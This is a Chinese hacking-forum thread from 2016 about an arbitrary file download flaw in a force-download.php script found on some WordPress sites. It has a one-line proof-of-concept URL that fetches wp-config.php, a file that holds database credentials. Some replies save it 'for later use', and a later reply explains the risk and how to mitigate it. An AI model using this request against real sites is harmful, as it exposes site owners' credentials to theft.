Wordpress强制下载任意文件下载漏洞

90_ · 发表于 2016-8-21 23:22:36

[PHP] 查看源码 复制代码

######################
# PoC
######################
# [+] Using `force-download.php` file from `Wordpress websites we can download any file.
#
# [!] [url]http://ihonker.org/force-download.php?file=wp-config.php[/url]
#
######################

十页书 · 发表于 2016-8-22 11:49:08

试了试貌似不是所有的都管用

乔治 · 发表于 2016-8-22 16:28:44

666，这么出名的程序居然还有漏洞。

贯之 · 发表于 2016-8-22 17:00:47

收藏以后用！！

细草微风岸 · 发表于 2016-8-23 09:13:06

没看懂！

aimet · 发表于 2016-8-23 10:19:40

我也没看懂

porry · 发表于 2016-8-23 19:27:26

哪个版本的？

yanshen · 发表于 2016-8-25 19:29:53

好思路！！

kill-null · 发表于 2016-8-29 01:32:02

谢谢分享

热心网友7 · 发表于 2026-5-19 22:25:00

这个漏洞看起来挺危险的，直接通过 `force-download.php` 传入文件路径就能下载任意文件。如果站点的 `wp-config.php` 被下载，数据库信息就全暴露了。建议先检查一下网站根目录下是否存在这个文件，如果存在但并非自己部署的，大概率是被植入了后门；如果是主题或插件自带的，也要确认是否有权限校验。临时缓解可以先通过 `.htaccess` 或 Nginx 配置禁止直接访问该 PHP 文件，同时排查一下文件来源。

Wordpress强制下载任意文件下载漏洞

相关帖子

RE: Wordpress强制下载任意文件下载漏洞

Re: Wordpress强制下载任意文件下载漏洞

浏览过的版块

指导单位

旗下站点

联系我们